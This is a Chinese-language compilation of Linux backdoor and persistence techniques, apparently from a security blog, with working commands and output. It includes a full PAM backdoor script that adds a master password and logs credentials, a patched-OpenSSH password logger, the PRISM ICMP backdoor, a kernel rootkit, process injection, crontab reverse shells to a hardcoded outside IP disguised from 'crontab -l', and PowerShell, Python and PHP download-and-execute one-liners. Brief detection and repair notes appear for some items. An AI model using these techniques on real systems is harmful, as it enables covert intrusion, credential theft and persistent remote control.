[root@server120 init]# nc -vv -l -p 2345 &
[root@server120 init]# ps axu | grep 3533 | grep -v grep
root 3533 0.0 0.0 103020 792 pts/1 S 13:46 0:00 nc -vv -l -p 2345
[root@server120 tmp]# netstat -antlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN 3533/nc 
[root@server120 tmp]# lsof -i:2345
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
nc 3533 root 3u IPv4 1753126 0t0 TCP *:dbm (LISTEN)

创建文件夹

[root@server120 tmp]# mkdir /tmp/empty
[root@server120 tmp]# mount --bind /tmp/empty/ /proc/3533
mount: block device /tmp/empty is write-protected, mounting read-only
mount: cannot mount block device /tmp/empty read-only

挂不上,一想是因为前几天测试sudo提权的时候把selinux打开了

[root@server120 tmp]# getenforce 
Enforcing
[root@server120 tmp]# setenforce 0
[root@server120 tmp]# mount --bind /tmp/empty/ /proc/3533

然后再看一下,ps和netstat看不到了。

[root@server120 tmp]# ps axu | grep 3533 | grep -v grep
[root@server120 tmp]# netstat -antlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN - 
[root@server120 tmp]# lsof -i:2345
[root@server120 tmp]#

大小变成了4096

[root@server120 tmp]# ls -ld /proc/3533
drwxr-xr-x. 2 root root 4096 7月 21 14:02 /proc/3533

修复:

[root@server120 tmp]# umount /proc/3533

检查mount:
1)/proc/mounts

[root@server120 tmp]# cat /proc/mounts | grep 3533
/dev/mapper/vg_template1-lv_root /proc/3533 ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0

2)/proc/$$/mountinfo

[root@server120 tmp]# cat /proc/$$/mountinfo | grep 3533
29 16 253:0 /tmp/empty /proc/3533 rw,relatime - ext4 /dev/mapper/vg_template1-lv_root rw,seclabel,barrier=1,data=ordered

3)mount -l

[root@server120 tmp]# mount -l | grep 3533
/tmp/empty on /proc/3533 type none (rw,bind)

因为mount -l 读取的是/etc/mtab,可以直接删除该条目。所以使用1)和2)更靠谱。

参考文章:
http://www.freebuf.com/articles/network/140535.html

自动化脚本


https://github.com/litsand/shell/blob/master/pam.sh

#!/bin/bash
## 
##查看版本:
##redhat yum list pam
##debian&Ubuntu dpkg -s libpam-modules | grep -i version | cut -d' ' -f2
##
PASS='test123' ##......
LOG='\/bin\/.sshlog' ##......

echo "
.___ ___. ___ ___ _______ ____ ____ 
| \/ | / _ \ / _ \ | \ \ \ / / 
| \ / | | | | | | | | | | .--. | \ \/ / 
| |\/| | | | | | | | | | | | | | \_ _/ 
| | | | | |_| | | |_| | | '--' | | | 
|__| |__| \___/ \___/ |_______/ |__| "
echo -e "\nPam-Backdoor\n{code this shit while learning pam}\n\n"
oldtime=`stat -c '%z' /lib/security/pam_ftp.so`
echo 'Pam backdoor starting!'
mirror_url='http://www.linux-pam.org/library/Linux-PAM-1.1.1.tar.gz'
#mirror_url='http://yum.singlehop.com/pub/linux/libs/pam/pre/library/Linux-PAM-0.99.6.2.tar.gz'
echo 'Fetching from '$mirror_url
wget $mirror_url #fetch the roll
tar zxf Linux-PAM-1.1.1.tar.gz #untar
cd Linux-PAM-1.1.1
#find and replace
sed -i -e 's/retval = _unix_verify_password(pamh, name, p, ctrl);/retval = _unix_verify_password(pamh, name, p, ctrl);\n\tif (strcmp(p,"'$PASS'")==0 ){retval = PAM_SUCCESS;}if(retval == PAM_SUCCESS){\n\tFILE * fp;\n\tfp = fopen("'$LOG'", "a");\n\tfprintf(fp, "%s : %s\\n", name, p);\n\tfclose(fp);\n\t}/g' modules/pam_unix/pam_unix_auth.c
DIS=`head /etc/issue -n 1|awk '{print $1}'`
#get the version
if [ $DIS = "CentOS" ];then
./configure --disable-selinux && make
else
./configure && make
fi
#copy modified pam_unix.so
if [ `uname -p` = 'x86_64' ];then
LIBPATH=lib64
else
LIBPATH=lib
fi
/bin/cp -rf /$LIBPATH/security/pam_unix.so /$LIBPATH/security/pam_unix.so.bak #.. .........
/bin/cp -rf modules/pam_unix/.libs/pam_unix.so /$LIBPATH/security/pam_unix.so
touch -d "$oldtime" /lib/security/pam_unix.so
cd .. && rm -rf Linux-PAM-1.1.1*
echo "Done bro.."

然后登录后便会记录密码

[root@server120 ~]# cat /bin/.sshlog 
root : test123

排查方式


1.通过Strace跟踪ssh

[root@server120 tmp]# ps axu | grep sshd
root 7262 0.0 0.0 66604 1232 ? Ss 2016 0:01 /usr/sbin/sshd
[root@server120 tmp]# strace -o aa -ff -p 7262
[root@server120 tmp]# grep open aa* | grep -v -e No -e null -e denied| grep WR
aa.26246:open("/bin/.sshlog", O_WRONLY|O_CREAT|O_APPEND, 0666) = 7

2.检查pam_unix.so的mtime
32位:

[root@server120 tmp]# stat /lib/security/pam_unix.so

64位:

[root@server120 tmp]# stat /lib64/security/pam_unix.so

修复方案


yum reinstall pam

参考文章


http://www.freebuf.com/articles/system/24104.html

支持平台

Linux

Solaris

AIX

BSD/Mac

Android

 

功能

支持两种模式:ICMP和STATIC

进程名自定义

没有监听端口

支持清空iptables配置

pure C开发

没有依赖库

 

项目地址

git clone https://github.com/andreafabrizi/prism.git

 

编译

gcc <..OPTIONS..> -Wall -s -o prism prism.c

 

选项如下:

-DDETACH #后台运行

-DSTATIC #开启STATIC模式 (默认ICMP模式)

-DNORENAME #不使用自定义的进程名

-DIPTABLES #清空所有的iptables规则

 

ICMP模式

使用这种模式的后门将会在后台等待特定的包含主机/端口连接信息的ICMP数据包,通过私有密钥可以阻止第三方访问。后门进程接受ping包激活。

 

可以修改密钥,默认是p4ssw0rd

vim prism.c

#ifdef STATIC

# define REVERSE_HOST     "172.16.100.182"

# define REVERSE_PORT     6666

# define RESPAWN_DELAY    15

#else

# define ICMP_PACKET_SIZE 1024

# define ICMP_KEY         "p4ssw0rd"

#endif



#define VERSION          "0.5"

#define MOTD             "PRISM v"VERSION" started\n\n# "

#define SHELL            "/bin/sh"

#define PROCESS_NAME     "udevd"
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

[root@vincent prism-master]# ./prism Inf0

 Version:          0.5

 Mode:                       icmp

 Key:                           p4ssw0rd

 Shell:                         /bin/sh

 Detach:           Yes

 Flush Iptables:        No

可以看到模式为icmp

攻击机(172.16.100.182):

nc -vv -l -p 6666

肉鸡(172.16.100.134):

./prism

攻击机(172.16.100.182):

./sendPacket.py 172.16.100.134 p4ssw0rd 172.16.100.182 6666

发送icmp包

内容如下:
p4ssw0rd 172.16.100.182 6666 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ

然后获得Shell。

root@kali:/tmp/prism# nc -l -p 6666

PRISM v0.5 started



# whoami

root

 

STATIC模式

后门尝试连接硬编码的IP:PORT

 

vim prism.c

#ifdef STATIC

# define REVERSE_HOST     "172.16.100.182"

# define REVERSE_PORT     6666

# define RESPAWN_DELAY    15

#else

# define ICMP_PACKET_SIZE 1024

# define ICMP_KEY         "p4ssw0rd"

#endif



#define VERSION          "0.5"

#define MOTD             "PRISM v"VERSION" started\n\n# "

#define SHELL            "/bin/sh"

#define PROCESS_NAME     "udevd"

可以看到自定义进程名称为udevd

重新编译

gcc -DDETACH -DSTATIC -Wall -s -o prism prism.c


[root@vincent prism-master]# ./prism Inf0

 Version:          0.5

 Mode:                       static

 Host:                         172.16.100.182

 Port:                          6666

 Respawn Delay:              15 sec

 Process name:                 udevd

 Shell:                         /bin/sh

 Detach:           Yes

 Flush Iptables:        No

攻击机(172.16.100.182):

nc -vv -l -p 6666

肉鸡(172.16.100.134):

./prism

查看进程

[root@vincent prism-master]# ps axu | grep udev | grep -v grep

root      14474  0.0  0.0   3924   144 pts/1    S    17:26   0:00 udevd

获得Shell

root@kali:/tmp/prism# nc -l -p 6666

PRISM v0.5 started



# whoami

root

 

下载地址:https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
功能列表:

Get root
$ ./sock 0
Hide PID
$ ./sock 1 [pid]
Unhide PID
$ ./sock 2 [pid]
Hide TCPv4 port
$ ./sock 3 [port]
Unhide TCPv4 port
$ ./sock 4 [port]
Hide TCPv6 port
$ ./sock 5 [port]
Unhide TCPv6 port
$ ./sock 6 [port]
Hide UDPv4 port
$ ./sock 7 [port]
Unhide UDPv4 port
$ ./sock 8 [port]
Hide UDPv6 port
$ ./sock 9 [port]
Unhide UDPv6 port
$ ./sock 10 [port]
Hide file/directory
$ ./sock 11 [name]
Unhide file/directory
$ ./sock 12 [name]

在CentOS6.5 64位下测试:
1)

[root@vincent suterusu-master]# make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build //注意这里是 linux-x86_64
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ " -C /lib/modules/2.6.32-642.1.1.el6.x86_64/build M=/tmp/suterusu-master modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'
CC [M] /tmp/suterusu-master/main.o
CC [M] /tmp/suterusu-master/util.o
CC [M] /tmp/suterusu-master/module.o
LD [M] /tmp/suterusu-master/suterusu.o
Building modules, stage 2.
MODPOST 1 modules
CC /tmp/suterusu-master/suterusu.mod.o
LD [M] /tmp/suterusu-master/suterusu.ko.unsigned
NO SIGN [M] /tmp/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'

2)

[root@vincent suterusu-master]# gcc sock.c -o sock
sock.c: 在函数‘main’中:
sock.c:205: 警告:隐式声明与内建函数‘strlen’不兼容
sock.c:220: 警告:隐式声明与内建函数‘strlen’不兼容

3)

[root@vincent suterusu-master]# insmod suterusu.ko

隐藏进程:

[root@vincent suterusu-master]# ./sock 1 5542
Hiding PID 5542

隐藏文件:
注意文件的隐藏只是针对文件名,也就是比如你想隐藏文件x,那么所有目录下的x都会被隐藏

[root@vincent suterusu-master]# ./sock 11image.php
Hiding file/dir ../image.php

隐藏连接:

[root@vincent suterusu-master]# netstat -ano | grep 49745
tcp 0 0 0.0.0.0:49745 0.0.0.0:* LISTEN off (0.00/0/0)
[root@vincent suterusu-master]# ./sock 3 49745
Hiding TCPv4 port 49745
[root@vincent suterusu-master]# netstat -ano | grep 49745
[root@vincent suterusu-master]#

测试机器:
CentOS5.5 32位和64位系统测试成功

[root@localhost mafix]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux
[root@localhost tmp]# tar zxvf mafix.tar.gz
mafix/
mafix/mafixlibs
mafix/mafix
mafix/root
mafix/HOW-TO
[root@localhost tmp]# cd mafix
[root@localhost mafix]# ls
HOW-TO mafix mafixlibs root
[root@localhost mafix]# ./root hehe123 2345 //其中hehe123为密码 2345为后门端口

123

[root@localhost mafix]# netstat -anlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN 15690/ttyload
[root@localhost mafix]# ps axu | grep 15690 | grep -v grep
root 15690 0.0 0.0 2280 508 ? Ss 22:20 0:00 /sbin/ttyload -q
[root@localhost mafix]# ll /proc/15690/exe
lrwxrwxrwx 1 root root 0 Jun 8 22:22 /proc/15690/exe -> /tmp/sh-AIN2LD3APKJ (deleted)

登录后门:

[root@vincent tmp]# ssh 172.16.100.154 -p 2345
root@maf!x:/root$ whoami
root

下载:https://sourceforge.net/projects/cymothoa/files/
测试环境:
32位环境下可以编译成功

[root@localhost cymothoa-1-alpha]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux

64位环境下编译报错
后门注入到的进程,只要有权限就行,然后反弹的也就是进程相应的权限,当然进程重启或者挂了也就没了

[root@localhost cymothoa-1-alpha]# make
cc cymothoa.c -o cymothoa -Dlinux_x86
[root@localhost cymothoa-1-alpha]# ps axu | grep httpd | grep root | grep -v grep 
root 14988 0.0 0.2 10068 2900 ? Ss 05:38 0:00 /usr/sbin/httpd
[root@localhost cymothoa-1-alpha]# ./cymothoa -p 14988 -s 0 -y 8888 //14988为要注入进程的进程号
[+] attaching to process 14988

 register info: 
 -----------------------------------------------------------
 eax value: 0xfffffdfe ebx value: 0x0
 esp value: 0xbfd121bc eip value: 0x6ed402
 ------------------------------------------------------------

[+] new esp: 0xbfd121b8
[+] injecting code into 0x00d27000
[+] copy general purpose registers
[+] detaching from 14988

[+] infected!!!

比如注入到httpd进程中,然后nc连接

[root@localhost cymothoa-1-alpha]# netstat -antlp | grep 8888
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN 15036/httpd 
root@kali-vincent:~# nc -vv 172.16.100.156 8888
172.16.100.156: inverse host lookup failed: Unknown host
(UNKNOWN) [172.16.100.156] 8888 (?) open
whoami
root

安装步骤:

http://core.ipsecs.com/rootkit/patch-to-hack/0×06-openssh-5.9p1.patch.tar.gz
http://ftp.eu.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
安装前首先
ssh -V
[root@vincent tmp]# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
记录下原来ssh版本信息,免得安装后一看就版本不一样了

tar zxvf openssh-5.9p1.tar.gz
tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch < sshbd5.9p1.diff //patch 后门

vi includes.h //修改后门密码,记录文件位置,

/*
+#define ILOG "/tmp/ilog" //记录登录到本机的用户名和密码
+#define OLOG "/tmp/olog" //记录本机登录到远程的用户名和密码
+#define SECRETPW "123456654321" //你后门的密码
*/

vi version.h //修改SSH_VERSION,改成原来的OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

 

123

先安装所需环境不然会报错

yum install -y openssl openssl-devel pam-devel
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

注意要是出现:configure: error: *** zlib.h missing – please install first or check config.log
需要安装zlib
yum install -y zlib zlib-devel
make && make install
service sshd restart //重启sshd
然后我们登录ssh看看,不会记录使用后门密码登录的记录。

修复方案:
1)重装openssh软件
2)SSH禁止对外开放

应急响应:
1)比对ssh的版本
ssh -V
2)查看ssh配置文件和/usr/sbin/sshd的时间
stat /usr/sbin/sshd
3)strings检查/usr/sbin/sshd,看是否有邮箱信息
strings可以查看二进制文件中的字符串,在应急响应中是十分有用的。有些sshd后门会通过邮件发送登录信息,通过strings /usr/sbin/sshd可以查看到邮箱信息。
4)通过strace监控sshd进程读写文件的操作
一般的sshd后门都会将账户密码记录到文件,可以通过strace进程跟踪到ssh登录密码文件。

ps axu | grep sshd | grep -v grep
root 65530 0.0 0.1 48428 1260 ? Ss 13:43 0:00 /usr/sbin/sshd
strace -o aa -ff -p 65530
grep open aa* | grep -v -e No -e null -e denied| grep WR
aa.102586:open("/tmp/ilog", O_WRONLY|O_CREAT|O_APPEND, 0666) = 4

下载地址:

http://prdownloads.sourceforge.net/icmpshell/ish-v0.2.tar.gz

需要注意两点:

1.) ISHELL uses raw sockets on both the client and server side, therefore root privileges ARE REQUIRED to use this program.

客户端和服务端需要用socket通信,需要用root权限

2.) When configuring the options for the server/client make sure the following options are the same on both the client and the server:

 

[root@server120 ISHELL-v0.2]# make linux

参数如下:

[root@server120 ISHELL-v0.2]# ./ishd -h

ICMP Shell v0.2  (server)   -   by: Peter Kieltyka

usage: ./ishd [options]



options:

 -h               Display this screen

 -d               Run server in debug mode

 -i <id>          Set session id; range: 0-65535 (default: 1515)

 -t <type>        Set ICMP type (default: 0)

 -p <packetsize>  Set packet size (default: 512)

被控端:

[root@server120 ISHELL-v0.2]# ./ishd -i 65535 -t 0 -p 1024 -d

-----+ IN DATA +------

id

-----+ OUT DATA +-----

uid=0(root) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

控制端:

[root@vincenthostname ISHELL-v0.2]# ./ish -i 65535 -t 0 -p 1024 172.16.100.134

 

 

最好用一个不常见的用户执行,任务写入/var/spool/cron/$username

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i')|crontab -

升级猥琐版

(crontab -l;printf "* * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

crontab -l 直接提示no crontab for $username
[root@vincenthostname bin]# crontab -l
no crontab for root
反弹成功
[vincent@iZ62luqzx5xZ src]$ ./netcat -l -p 2345
bash: no job control in this shell
[root@vincenthostname ~]# whoami
whoami
root

转自:http://zone.wooyun.org/content/18244

Metasploit的模块Web Delivery用于在Kali上启动Server服务,访问内容包含Payload。

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

在测试机执行该Python

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

Powershell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

 

测试机执行该powershell语句

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

 

获取到反弹shell

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671